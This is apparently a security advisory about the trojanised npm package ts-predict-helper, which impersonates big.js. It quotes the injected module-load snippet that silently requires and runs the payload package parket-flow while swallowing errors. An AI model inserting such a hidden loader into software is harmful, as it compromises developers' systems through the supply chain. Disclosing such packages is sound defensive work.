ts-predict-helper @3.7.1

Summary

Package is published as ts-predict-helper but ships a byte-equivalent copy of big.js v7.0.1's source and README (which states 'No dependencies'), along with spoofed package.json metadata pointing at MikeMcl/big.js and naming Michael Mclaughlin as author. Inside the otherwise-verbatim big.js source (around line 530) an injected try/catch block runs at module load: try { const doc = require("parket-flow"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { } . The package declares an undisclosed runtime dependency on parket-flow ^3.0.1, which is unrelated to arbitrary-precision arithmetic and is the actual payload carrier. Any consumer who installs ts-predict-helper (e.g. via a copy-pasted install snippet) and require() s it will silently pull parket-flow into their dependency tree and invoke its from_str() API in-process, with all errors swallowed to hide failure. The combination of identity spoofing (verbatim README/source/author/repo metadata under an unrelated package name) and a hidden side-effect require at load time is a textbook trojan-loader supply-chain pattern; whatever code parket-flow ships executes in the installer's Node.js process.

Source: amazon-inspector (7efbafcedfb49da5093c3972473a549694dd9dd748281a299034c31578db1943)